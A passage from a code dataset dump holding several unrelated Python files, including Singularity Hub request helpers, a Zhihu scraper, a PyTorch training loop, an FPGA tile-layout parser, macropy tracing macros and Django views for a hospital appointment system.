:param stream_to: stream the response to file\n '''\n bot.logger.debug(\"GET %s\",url)\n\n stream = False\n if stream_to is not None:\n stream = True\n\n if headers == None:\n headers = get_headers(token=token)\n\n if data == None:\n response = requests.get(url, \n headers=headers,\n stream=stream)\n else:\n response = requests.get(url, \n headers=headers,\n json=data,\n stream=stream)\n\n if response.status_code == 200 and return_json and not stream:\n return response.json()\n\n \n chunk_size = 1 << 20\n with open(stream_to,'wb') as filey:\n for chunk in response.iter_content(chunk_size=chunk_size):\n filey.write(chunk)\n\n return stream_to \n\n\n\ndef api_put(url,headers=None,token=None,data=None, return_json=True):\n '''api_put will send a read file (spec) to Singularity Hub with a particular set of headers\n :param url: the url to send file to\n :param headers: the headers to get\n :param headers: a dictionary with headers for the request\n :param data: additional data to add to the request\n :param return_json: return json if successful\n '''\n bot.logger.debug(\"PUT %s\",url)\n\n if headers == None:\n headers = get_headers(token=token)\n if data == None:\n response = requests.put(url, \n headers=headers)\n else:\n response = requests.put(url, \n headers=headers,\n json=data)\n \n if response.status_code == 200 and return_json:\n return response.json()\n\n return response\n\n\ndef api_post(url,headers=None,data=None,token=None,return_json=True):\n '''api_get will use requests to get a particular url\n :param url: the url to send file to\n :param headers: a dictionary with headers for the request\n :param data: additional data to add to the request\n :param return_json: return json if successful\n '''\n bot.logger.debug(\"POST %s\",url)\n\n if headers == None:\n headers = get_headers(token=token)\n if data == None:\n response = requests.post(url, \n headers=headers)\n else:\n response = requests.post(url, \n headers=headers,\n json=data)\n\n if response.status_code == 200 and return_json:\n return response.json()\n\n return response\n\n\n######################################################################\n# OS/IO and Formatting Functions\n######################################################################\n\n\ndef is_number(container_name):\n '''is_number determines if the user is providing a singularity hub\n number (meaning the id of an image to download) vs a full name)\n '''\n if isinstance(container_name,dict):\n return False\n try:\n float(container_name)\n return True\n except ValueError:\n return False\n\n\ndef parse_container_name(image):\n '''parse_container_name will return a json structure with a repo name, tag, user.\n '''\n container_name = image\n if not is_number(image):\n image = image.replace(' ','')\n\n # If the user provided a number (unique id for an image), return it\n if is_number(image) == True:\n bot.logger.info(\"Numeric image ID %s found.\", image)\n return int(image)\n\n image = image.split('/')\n\n # If there are two parts, we have username with repo (and maybe tag)\n if len(image) >= 2:\n user = image[0]\n image = image[1]\n\n # Otherwise, we trigger error (not supported just usernames yet)\n else:\n bot.logger.error('You must specify a repo name and username, %s is not valid',container_name)\n sys.exit(1)\n\n # Now split the name by : in case there is a tag\n image = image.split(':')\n if len(image) == 2:\n repo_name = image[0]\n repo_tag = image[1]\n\n # Otherwise, assume latest of an image\n else:\n repo_name = image[0]\n repo_tag = \"latest\"\n\n bot.logger.info(\"User: %s\", user)\n bot.logger.info(\"Repo Name: %s\", repo_name)\n bot.logger.info(\"Repo Tag: %s\", repo_tag)\n\n parsed = {'repo_name':repo_name,\n 'repo_tag':repo_tag,\n 'user':user }\n\n return parsed\n\n\n######################################################################\n# Downloading\n######################################################################\n\n\ndef download_atomically(url,file_name,headers=None):\n '''download atomically will stream to a temporary file, and\n rename only upon successful completion. This is to ensure that\n errored downloads are not found as complete in the cache\n :param file_name: the file name to stream to\n :param url: the url to stream from\n :param headers: additional headers to add to the get (default None)\n '''\n try: # file_name.tmp.XXXXXX\n fd, tmp_file = tempfile.mkstemp(prefix=(\"%s.tmp.\" % file_name)) \n os.close(fd)\n response = api_get(url,headers=headers,stream_to=tmp_file)\n if isinstance(response, HTTPError):\n bot.logger.error(\"Error downloading %s, exiting.\", url)\n sys.exit(1)\n os.rename(tmp_file, file_name)\n except:\n download_folder = os.path.dirname(os.path.abspath(file_name))\n bot.logger.error(\"Error downloading %s. Do you have permission to write to %s?\", url, download_folder)\n try:\n os.remove(tmp_file)\n except:\n pass\n sys.exit(1)\n return file_name\n","sub_path":"singularity/hub/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"265573563","text":"# -*- coding: utf-8 -*-\nimport platform\nfrom bs4 import BeautifulSoup\nimport bs4\nfrom question import Question\nfrom user import User\nimport cookielib\nimport requests\n\nrequests = requests.Session()\nrequests.cookies = cookielib.LWPCookieJar('cookies')\ntry:\n requests.cookies.load(ignore_discard=True)\nexcept:\n Logging.error(u\"你还没有登录知乎哦 ...\")\n Logging.info(u\"执行 `python auth.py` 即可以完成登录。\")\n raise Exception(\"无权限(403)\")\n\n\nclass Answer:\n answer_url = None\n # session = None\n soup = None\n\n def __init__(self, answers_html):\n if isinstance(answers_html, bs4.element.Tag):\n self.soup = answers_html\n else:\n self.soup = BeautifulSoup(answers_html, \"lxml\")\n # self.question = question\n self.rooturl = \"https://www.zhihu.com\"\n\n # def get_question(self):\n # return self.question\n\n def get_author(self):\n soup = self.soup\n author_url, author_id = None, None\n if soup.find(\"div\", class_=\"zm-item-answer-author-info\").get_text(strip='\\n') == u\"匿名用户\":\n pass\n else:\n author_tag = soup.find(\n \"div\", class_=\"zm-item-answer-author-info\").find_all(\"a\")[1]\n author_id = author_tag.string.encode(\"utf-8\")\n author_url = \"http://www.zhihu.com\" + author_tag[\"href\"]\n return author_url, author_id\n\n def get_upvote(self):\n soup = self.soup\n count = soup.find(\"span\", class_=\"count\").string\n if count[-1] == \"K\":\n upvote = int(count[0:(len(count) - 1)]) * 1000\n elif count[-1] == \"W\":\n upvote = int(count[0:(len(count) - 1)]) * 10000\n else:\n upvote = int(count)\n return upvote\n\n def get_content(self):\n soup = self.soup\n answer = soup.find(\"div\", class_=\"zm-editable-content clearfix\")\n content = soup\n self.content = content\n return content\n\n # def get_visit_times(self):\n # return self.question.get_visit_times()\n\n def get_answerid(self,):\n return self.soup['data-aid']\n","sub_path":"zhihu/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"209382859","text":"class Solution(object):\r\n def maxSubArray(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n summation = nums[0]\r\n maximum = nums[0]\r\n \r\n for item in nums[1:]:\r\n if summation + item> item:\r\n summation = summation + item\r\n else: \r\n summation = item\r\n \r\n maximum = max(summation, maximum)\r\n #print(summation,maximum)\r\n \r\n return maximum\r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.maxSubArray([-2,1,-3,4,-1,2,1,-5,4]))\r\n","sub_path":"maxSubArray.py","file_name":"maxSubArray.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239195018","text":"\nfrom model import *\nfrom preprocess import *\n\nimport torch.optim as optim\n\nimport matplotlib.pyplot as plt\n\nclass TrainingHandler(object):\n def __init__(self, model, train_sets, val_sets, learning_rate, save_dir, clip=5.0, tf_ratio=0.5, eps=1e-8):\n self.model=model\n\n self.train_set = [pair for movie in train_sets for pair in movie]\n self.val_set = [pair for movie in val_sets for pair in movie] if val_sets is not None else None\n\n self.clip = clip\n self.tf_ratio = tf_ratio\n self.save_dir = save_dir\n\n self.epoch = 0\n self.lr = learning_rate\n\n self.optim = optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=learning_rate, eps=eps)\n\n self.train_losses = []\n self.val_losses = []\n\n self.mode = \"auto\"\n\n def freeze_model(self):\n for param in self.model.encoder.parameters():\n param.requires_grad=False\n for param in self.model.decoder.parameters():\n param.requires_grad=False\n\n def train_autoencoder(self, epochs, batch_size, print_interval=1, save_interval=-1):\n print(\"Beginning training...\")\n start = time.time()\n\n epoch = 0\n while epoch < epochs:\n epoch += 1\n\n loss_total = 0.0\n\n batches = random_batches(batch_size, self.train_set, auto=True)\n n_batches = len(batches)\n\n for batch in batches:\n self.optim.zero_grad()\n\n # Run the train function\n loss = self.model.train_naive(batch, tf_ratio=self.tf_ratio)\n\n # Clip gradient norms\n c = torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n\n # Update parameters with optimizers\n self.optim.step()\n loss_total += loss\n\n loss_avg = loss_total / n_batches\n\n if self.val_set is not None:\n val_loss_avg = self._val_autoencoder(batch_size)\n else:\n val_loss_avg = loss_avg\n\n if print_interval > 0:\n if self.epoch % print_interval == 0:\n print_summary = '-' * 40 + '\\nEPOCH #%d SUMMARY:\\nTotal time spent (time left): %s, Training loss: %.4f, Validation loss: %.4f' \\\n % (epoch,\n time_since(start, (epoch) / epochs),\n float(loss_avg), float(val_loss_avg))\n self._print_log(print_summary)\n\n if epoch < epochs:\n if save_interval > 0:\n if epoch % save_interval == 0:\n name = \"auto_\" + str(epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, mem=False)\n else:\n if self.save_dir is not None:\n name = \"auto_\" + str(epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, save_loss=True, mem=False)\n\n def _val_autoencoder(self, batch_size):\n total_val_loss = 0.0\n\n batches = random_batches(batch_size, self.val_set, auto=True)\n n_batches = len(batches)\n\n for batch in batches:\n loss = self.model.validate(batch)\n total_val_loss += loss\n\n return total_val_loss / n_batches\n\n def train_memory(self, epochs, batch_size, freeze_enc=False, print_interval=1, save_interval=-1):\n self.init_memory(freeze_enc)\n\n print(\"Beginning training...\")\n start = time.time()\n\n self.model.memory.add_pairs(self.train_set)\n\n epoch = 0\n while epoch < epochs:\n epoch += 1\n\n loss_total = 0.0\n\n batches = memory_random_batches(batch_size, self.train_set)\n n_batches = len(batches)\n\n for batch in batches:\n self.optim.zero_grad()\n\n # Run the train function\n loss = self.model.train_batch(batch, tf_ratio=self.tf_ratio)\n\n # Clip gradient norms\n c = torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n\n # Update parameters with optimizers\n self.optim.step()\n loss_total += loss\n\n loss_avg = loss_total / n_batches\n\n if self.val_set is not None:\n val_loss_avg = self._val_autoencoder(batch_size)\n else:\n val_loss_avg = loss_avg\n\n if print_interval > 0:\n if self.epoch % print_interval == 0:\n print_summary = '-' * 40 + '\\nEPOCH #%d SUMMARY:\\nTotal time spent (time left): %s, Training loss: %.4f, Validation loss: %.4f' \\\n % (self.epoch,\n time_since(start, (epoch) / epochs),\n float(loss_avg), float(val_loss_avg))\n self._print_log(print_summary)\n\n if self.epoch < epochs:\n if save_interval > 0:\n if self.epoch % save_interval == 0:\n name = \"auto_\" + str(self.epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, mem=True)\n else:\n if self.save_dir is not None:\n name = \"auto_\" + str(self.epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, save_loss=True, mem=True)\n\n def _val_memory(self, batch_size):\n assert len(self.val_sets) > 0\n val_subsets = partition_movies(self.val_sets, self.set_size)\n total_batches = 0\n val_loss_total = 0\n for val_pairs in val_subsets:\n val_batches = memory_random_batches(batch_size, val_pairs, val_indices, val_mask)\n val_n_batches =len(val_batches)\n total_batches += val_n_batches\n for i in range(val_n_batches):\n val_loss = self.model.validate(val_batches[i])\n val_loss_total += val_loss\n val_loss_avg = val_loss_total / total_batches\n return val_loss_avg\n\n def _print_log(self, print_summary):\n print(print_summary)\n if self.save_dir is not None:\n save_logs(print_summary, self.save_dir)\n\n def _save_checkpoint(self, save_dir, name, save_loss=False, mem=False):\n # Calculate and save BLEU score\n if mem and not self.val_set is None:\n max_val_size = max([len(v) for v in self.val_set])\n self.model.memory.reset_memory(max_val_size)\n self.model.memory.update_encoder(self.model.encoder)\n old_scores, new_scores = self.model.score_set(self.val_set)\n save_scores(old_scores, new_scores, save_dir)\n\n if save_loss == True:\n fig_out = save_dir + FIG_FILE\n df_out = save_dir + LOSS_FILE\n if USE_CUDA:\n self._save_losses(df_out)\n else:\n (self._plot_losses()).savefig(fig_out)\n\n # Save model checkpoint\n self.model.memory.reset_memory()\n self.model.export_state(save_dir, name)\n\n def _plot_losses(self):\n fig = plt.figure()\n plt.plot(self.train_losses, color='red', label='Train_loss', marker='o')\n plt.plot(self.val_losses, color='blue', label='Val_loss', marker='o')\n plt.legend(loc='upper right', frameon=False)\n plt.xlabel('Epochs')\n plt.ylabel('Cross-Entropy Loss')\n return fig\n\n def _save_losses(self, path):\n outfile = open(path, 'w')\n for i in range(len(self.train_losses)):\n outfile.write(str(self.train_losses[i])+','+str(self.val_losses[i])+\"\\n\")\n outfile.close()\n","sub_path":"training_handler.py","file_name":"training_handler.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574722304","text":"\"\"\"Parser implementation for the Gowin EDA .dat file, which contains the\ntile layout of the FPGA\"\"\"\nimport io\nimport functools\nimport struct\nimport enum\nfrom typing import NamedTuple, List, Any, Dict, Tuple\n\n# The entire file is one big structure. These offsets are hence magic.\nFILE_TILE_TYPE_OFFSET = 0x1670\nFILE_TILE_ENABLED_OFFSET = 0x1EB30\nFILE_GRID_INFO_OFFSET = 0x26060\n\n# Maximum grid size supported in the file\nGRID_COLS = 200\nGRID_ROWS = 150\n\n\nclass GridInfo(NamedTuple):\n \"\"\"basic metadata about the grid\"\"\"\n rows: int\n columns: int\n center_x: int\n center_y: int\n\n\nclass TileType(enum.Enum):\n EMPTY = 0\n IOBUF = 1\n LVDS = 2 # GW2A* only\n ROUTING = 3 # probably?\n CFU = 4 # Configuratble Function Unit\n CFU_RAM = 5 # CFU ram mode option\n BRAM = 6 # Block RAM\n DSP = 7 # Multiply/Accumulate\n PLL = 8 # Phase Locked Loop\n DLL = 9 # Delay Locked Loop\n\n\nTILE_TYPE_CHARS = {\n TileType.EMPTY: \" \",\n TileType.IOBUF: \"I\",\n TileType.LVDS: \"L\",\n TileType.ROUTING: \"R\",\n TileType.CFU: \"C\",\n TileType.CFU_RAM: \"M\",\n TileType.BRAM: \"B\",\n TileType.DSP: \"D\",\n TileType.PLL: \"P\",\n TileType.DLL: \"Q\",\n}\n\nTileGrid = List[List[Tuple[TileType, bool]]]\n\n\ndef tile_to_text_tile(tile: Tuple[TileType, bool]) -> str:\n \"\"\"convert a tile into the character format required by the fuzzer json file\"\"\"\n type_char = TILE_TYPE_CHARS[tile[0]]\n return type_char if tile[1] else type_char.lower()\n\n\nclass DatFileReader:\n \"\"\"reads the .dat file\"\"\"\n\n # TODO: file magic detection/early fail\n def __init__(self, f: memoryview) -> None:\n self._f = f\n\n @classmethod\n def from_file(cls, f: io.BufferedReader) -> \"DatFileReader\":\n \"\"\"read a dat file from an open file\"\"\"\n return cls(memoryview(f.read()))\n\n def read_grid_info(self) -> GridInfo:\n grid_h, grid_w, cc_y, cc_x = struct.unpack_from(\n \" TileGrid:\n \"\"\"read the grid, which describes the tile layout\"\"\"\n grid_info = self.read_grid_info()\n # the grid area has a constant size of 200x150 tiles\n rows = []\n for y in range(GRID_ROWS):\n row = []\n for x in range(GRID_COLS):\n idx = y * 200 + x\n type_offset = FILE_TILE_TYPE_OFFSET + 4 * idx\n tile_type_id = struct.unpack_from(\"= grid_info.columns:\n if not tile_type == TileType.EMPTY:\n raise ValueError(\n f\"expected empty tile outside of column range, found {tile_type}\"\n )\n continue\n row.append((tile_type, tile_enabled))\n\n if y >= grid_info.rows:\n if not tile_type == TileType.EMPTY:\n raise ValueError(\n f\"expected empty tile outside of row range, found {tile_type}\"\n )\n continue\n rows.append(row)\n\n return rows\n\n def print_grid(self) -> None:\n \"\"\"print out grid in nice human-redable form\"\"\"\n grid_info = self.read_grid_info()\n # hack to print vertical counting header, zip(*it) translates a table\n for num in zip(*(str(i).rjust(3) for i in range(grid_info.columns))):\n print(\" \", \"\".join(num))\n print()\n grid = [[tile_to_text_tile(t) for t in row] for row in self.read_grid()]\n for idx, row in enumerate(grid):\n print(f\"{idx:3}\", \"\".join(row))\n\n def to_json_dict(self) -> Dict[str, Any]:\n \"\"\"return the dat as a dict suitable for dumping into .json for other tools\"\"\"\n res: Dict[str, Any] = {}\n grid_info = self.read_grid_info()\n res[\"rows\"] = grid_info.rows\n res[\"cols\"] = grid_info.columns\n res[\"center\"] = (grid_info.center_x, grid_info.center_y)\n\n res[\"grid\"] = [[tile_to_text_tile(t) for t in row] for row in self.read_grid()]\n return res\n","sub_path":"pyapicula/parsers/dat.py","file_name":"dat.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"420327766","text":"\"\"\"Add map_index to TaskRun\n\nRevision ID: 6985feb1b47d\nRevises: 03377d1c7c67\nCreate Date: 2019-09-14 15:28:16.960467\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6985feb1b47d\"\ndown_revision = \"03377d1c7c67\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\"task_run\", sa.Column(\"map_index\", sa.Integer(), nullable=True))\n\n\ndef downgrade():\n op.drop_column(\"task_run\", \"map_index\")\n","sub_path":"praetor/migrations/versions/6985feb1b47d_add_map_index_to_taskrun.py","file_name":"6985feb1b47d_add_map_index_to_taskrun.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"546076759","text":"\nfrom macropy.core.macros import *\nfrom macropy.core.quotes import macros, q, u\nimport ast\nimport copy\n\nmacros = Macros()\n\n__all__ = ['wrap', 'wrap_simple', 'handle', 'log']\n\ndef wrap(printer, txt, x):\n string = txt + \" -> \" + repr(x)\n printer(string)\n return x\n\ndef wrap_simple(printer, txt, x):\n string = txt\n printer(string)\n return x\n\n@macros.expr()\ndef log(tree, exact_src, **kw):\n new_tree = q(wrap(log, u(exact_src(tree)), ast(tree)))\n return new_tree\n\n@macros.expr()\ndef show_expanded(tree, expand_macros, **kw):\n expanded_tree = expand_macros(tree)\n new_tree = q(wrap_simple(log, u(unparse_ast(expanded_tree)), ast(expanded_tree)))\n return new_tree\n\n@macros.block()\ndef show_expanded(tree, expand_macros, **kw):\n\n new_tree = []\n for stmt in tree:\n new_stmt = expand_macros(stmt)\n\n with q as code:\n log(u(unparse_ast(new_stmt)))\n new_tree.append(code)\n new_tree.append(new_stmt)\n\n return new_tree\n\n@Walker\ndef trace_walk(tree, ctx, stop, **kw):\n\n if isinstance(tree, expr) and \\\n tree._fields != () and \\\n type(tree) is not Num and \\\n type(tree) is not Str and \\\n type(tree) is not Name:\n\n try:\n literal_eval(tree)\n stop()\n return tree\n except ValueError:\n txt = ctx(tree)\n trace_walk.walk_children(tree, ctx)\n\n wrapped = q(wrap(log, u(txt), ast%tree))\n stop()\n return wrapped\n\n elif isinstance(tree, stmt):\n txt = ctx(tree)\n trace_walk.walk_children(tree , ctx)\n with q as code:\n log(u(txt))\n stop()\n return [code, tree]\n\n@macros.expr()\ndef trace(tree, exact_src, **kw):\n ret = trace_walk.recurse(tree, exact_src)\n return ret\n\n@macros.block()\ndef trace(tree, exact_src, **kw):\n ret = trace_walk.recurse(tree, exact_src)\n return ret\n\n\ndef _require_transform(tree, exact_src):\n ret = trace_walk.recurse(copy.deepcopy(tree), exact_src)\n trace_walk.recurse(copy.deepcopy(tree), exact_src)\n new = q(ast(tree) or handle(lambda log: ast(ret)))\n return new\n\ndef handle(thunk):\n out = []\n thunk(out.append)\n raise AssertionError(\"Require Failed\\n\" + \"\\n\".join(out))\n\n@macros.expr()\ndef require(tree, exact_src, **kw):\n return _require_transform(tree, exact_src)\n\n@macros.block()\ndef require(tree, exact_src, **kw):\n for expr in tree:\n expr.value = _require_transform(expr.value, exact_src)\n\n return tree\n\ndef log(x):\n print(x)\n","sub_path":"macropy/tracing.py","file_name":"tracing.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360780151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render_to_response, render\nfrom manageHospital import models\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_protect\nfrom manageHospital.models import *\n\n\n\n# Create your views here.\n\ndef first_page(request):\n\treturn render_to_response('first_page.html')\n\ndef receptionist_login(request):\n\tif request.method == 'POST':\n\t\trequest.session['r_user_id']=\"\"\n\t\tform = login(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser_id = form.cleaned_data['user_id']\n\t\t\tuser_pwd = form.cleaned_data['user_pwd']\n\t\t\tmatched = login_details.objects.filter(type = '2', username = user_id, password = user_pwd)\n\t\t\tif len(matched) is 1:\n\t\t\t\trequest.session['r_user_id'] = user_id\n\t\t\t\treturn HttpResponseRedirect('home/')\n\telse:\n\t\trequest.session['r_user_id']=\"\"\n\t\tform = login()\n\tuser_type = \"Receptionist\"\n\treturn render(request, 'login_withform.html', {'user_type': user_type, 'form': form})\n\ndef receptionist_home(request):\n\tuser_id = request.session['r_user_id']\n\tq0 = receptionist.objects.get(receptionist_login = user_id)\n\tname = q0.receptionist_name\n\tq3 = q0.appointment_set.all()\n\tdata=[]\n\tfor i in q3:\n\t\tx = i, patients.objects.get(id = i.patient_id.id)\n\t\tdata.append(x)\n\treturn render_to_response('receptionist_home.html', {'name': name, 'data': data})\n\ndef receptionist_new_patient(request):\n\tif request.method == 'POST':\n\t\tform = patient_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tr_id = request.session['r_user_id']\n\t\t\tr_obj = receptionist.objects.get(receptionist_login = r_id)\n\t\t\tq = patients(patient_name= form.cleaned_data['patient_name'], patient_city_name=form.cleaned_data['patient_city_name'], patient_house_no=form.cleaned_data['patient_house_no'], patient_street_no = form.cleaned_data['patient_street_no'], patient_age = form.cleaned_data['patient_age'],patient_gender = form.cleaned_data['patient_gender'])\n\t\t\tq.save()\n\t\t\ta = appointment(receptionist_id = r_obj, patient_id = q, patient_date_of_admission = form.cleaned_data['patient_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\n\t\t\ta.save()\n\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\td_object.doctor_availability = False\n\t\t\td_object.save()\n\n\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\tc.save()\n\n\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\tform = patient_det()\n\t\tprint(\"sdf\")\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef receptionist_existing_patient(request):\n\tif request.method == 'POST':\n\t\tform = patient_existing_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tr_id = request.session['r_user_id']\n\t\t\tr_obj = receptionist.objects.get(receptionist_login = r_id)\n\t\t\tp_id = form.cleaned_data['patient']\n\t\t\tp_object = patients.objects.get(id = p_id)\n\t\t\ta = appointment(receptionist_id = r_obj, patient_id = p_object, patient_date_of_admission = form.cleaned_data['patient_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\n\t\t\ta.save()\n\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\td_object.doctor_availability = False\n\t\t\td_object.save()\n\n\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\tc.save()\n\n\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\tform = patient_existing_det()\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef receptionist_edit_appointment(request, appointment_id):\n\tif request.method == 'POST':\n\t\ta = appointment.objects.get(id=appointment_id)\n\t\tif a.treated == True:\n\t\t\tform = appointment_edit_treated(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tpatient_room_no = form.cleaned_data['patient_room_no']\n\t\t\t\tr = room.objects.get(id=patient_room_no)\n\t\t\t\ta.room_id = r\n\t\t\t\ta.save()\n\t\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\n\t\telse:\n\t\t\tform = appointment_edit(request.POST)\n\t\t\t#print (\"sdfsvv\")\n\t\t\tif form.is_valid():\n\t\t\t\t#print (\"hahaha\")\n\t\t\t\tpatient_date_of_admission = form.cleaned_data['patient_date_of_admission']\n\t\t\t\tpatient_problem = form.cleaned_data['patient_problem']\n\t\t\t\tchoice = form.cleaned_data['choice']\n\t\t\t\ta.patient_problem = patient_problem\n\t\t\t\ta.patient_date_of_admission = patient_date_of_admission\n\t\t\t\t#print (choice)\n\t\t\t\tif choice == \"1\":\n\t\t\t\t\t#print (\"aya\")\n\t\t\t\t\tc = consults.objects.get(appointment_id = a)\n\t\t\t\t\td = c.doctor_id\n\t\t\t\t\td.doctor_availability = True\n\t\t\t\t\td.save()\n\t\t\t\t\tc.delete()\n\t\t\t\t\ta.save()\n\t\t\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\t\t\t#print (\"IUGIBJFNSJN\")\n\t\t\t\t\t#print (d_id)\n\t\t\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\t\t\td_object.doctor_availability = False\n\t\t\t\t\td_object.save()\n\t\t\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\t\t\tc.save()\n\t\t\t\telse:\n\t\t\t\t\ta.save()\n\t\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\ta = appointment.objects.get(id=appointment_id)\n\t\tp = patients.objects.get(id = a.patient_id.id)\n\t\tc = consults.objects.get(appointment_id = a)\n\t\td = c.doctor_id\n\t\tif a.treated == True and c.allot_room == True:\n\t\t\ttry:\n\t\t\t\tform = appointment_edit_treated(initial={'patient_room_no': a.room_id.id})\n\t\t\texcept:\n\t\t\t\tform = appointment_edit_treated()\n\t\t\treturn render(request, 'edit_appointment_treated.html', {'p': p, 'form': form})\n\t\telif a.treated == True: \n\t\t\treturn render(request, 'error_room_not_alloted.html')\n\t\telse:\n\t\t\tform = appointment_edit(initial={'patient_problem': a.patient_problem, 'patient_date_of_admission': a.patient_date_of_admission})\n\t\t\treturn render(request, 'edit_appointment.html', {'p': p, 'form': form, 'd': d})\n\ndef view_patient_edit(request):\n\tp = patients.objects.all()\n\treturn render_to_response('all_patients.html',{'data' : p})\n\ndef receptionist_edit_patient(request, patient_id):\n\tif request.method == 'POST':\n\t\tp = patients.objects.get(id = patient_id)\n\t\tform = patient_edit(request.POST)\n\t\t#print (\"sdfsvv\")\n\t\tif form.is_valid():\n\t\t\t#print (\"hahaha\")\n\t\t\tpatient_name = form.cleaned_data['patient_name']\n\t\t\tpatient_city_name = form.cleaned_data['patient_city_name']\n\t\t\tpatient_house_no = form.cleaned_data['patient_house_no']\n\t\t\tpatient_street_no = form.cleaned_data['patient_street_no']\n\t\t\tpatient_age = form.cleaned_data['patient_age']\n\t\t\tpatient_gender = form.cleaned_data['patient_gender']\n\t\t\tp.patient_name = patient_name\n\t\t\tp.patient_city_name = patient_city_name\n\t\t\tp.patient_house_no = patient_house_no\n\t\t\tp.patient_street_no = patient_street_no\n\t\t\tp.patient_age = patient_age\n\t\t\tp.patient_gender = patient_gender\n\t\t\tp.save()\n\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\n\t\t\t#print (choice)\n\telse:\n\t\tp = patients.objects.get(id = patient_id)\n\t\tform = patient_edit(initial={'patient_name': p.patient_name, 'patient_city_name': p.patient_city_name, 'patient_house_no': p.patient_house_no, 'patient_street_no': p.patient_street_no, 'patient_age': p.patient_age, 'patient_gender': p.patient_gender})\n\t\treturn render(request, 'edit_patient.html', {'p': p, 'form': form})\n\n\ndef doctor_home(request):\n\tuser_id = request.session['d_user_id']\n\tq0 = doctors.objects.get(doctor_login = user_id)\n\tname = q0.doctor_name;\n\tq3 = q0.consults_set.all()\n\tdata=[]\n\t#p=[]\n\tfor i in q3:\n\t\ttry:\n\t\t\tx = appointment.objects.get(id = i.appointment_id.id)\n\t\t\tp=(appointment.objects.filter(id = i.appointment_id.id)[0],patients.objects.filter(id = x.patient_id.id)[0])\n\t\t\tdata.append(p)\n\t\texcept:\n\t\t\tprint (\"hi\")\n\t\t#print (p[1].patient_gender)\n\tnew_patient = []\n\ttry:\n\t\tc1 = q3[len(q3) - 1]\n\t\tnew_patient = appointment.objects.get(id=c1.appointment_id.id, treated = False)\n\texcept:\n\t\tprint (\"hi\")\n\treturn render_to_response('doctor_home.html', {'name': name, 'data': data, 'new_patient': new_patient})\n\ndef doctor_login(request):\n\tif request.method == 'POST':\n\t\trequest.session['d_user_id']=\"\"\n\t\tform = login(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser_id = form.cleaned_data['user_id']\n\t\t\tuser_pwd = form.cleaned_data['user_pwd']\n\t\t\tmatched = login_details.objects.filter(type = '1', username = user_id, password = user_pwd)\n\t\t\tif len(matched) is 1:\n\t\t\t\trequest.session['d_user_id'] = user_id\n\t\t\t\treturn HttpResponseRedirect('home/')\n\telse:\n\t\trequest.session['d_user_id']=\"\"\n\t\tform = login()\n\tuser_type = \"Doctor\"\n\treturn render(request, 'login_withform.html', {'user_type': user_type, 'form': form})\n\ndef patient_doctor(request,patient_id):\n\tp = patients.objects.get(id = patient_id)\n\tuser_id = request.session['d_user_id']\n\tq0 = doctors.objects.get(doctor_login = user_id)\n\tc = appointment.objects.filter(patient_id = p)\n\ta = []\n\tc1 = []\n\tfor i in c:\n\t\ttry:\n\t\t\tx = consults.objects.get(appointment_id=i, doctor_id=q0)\n\t\t\tc1.append(x)\n\t\texcept:\n\t\t\tprint (\"hii\")\n\tfor i in c1:\n\t\tprint(i)\n\t\tpp=(i,appointment.objects.get(id=i.appointment_id.id))\n\t\ta.append(pp)\n\treturn render_to_response('patient_doctor.html', 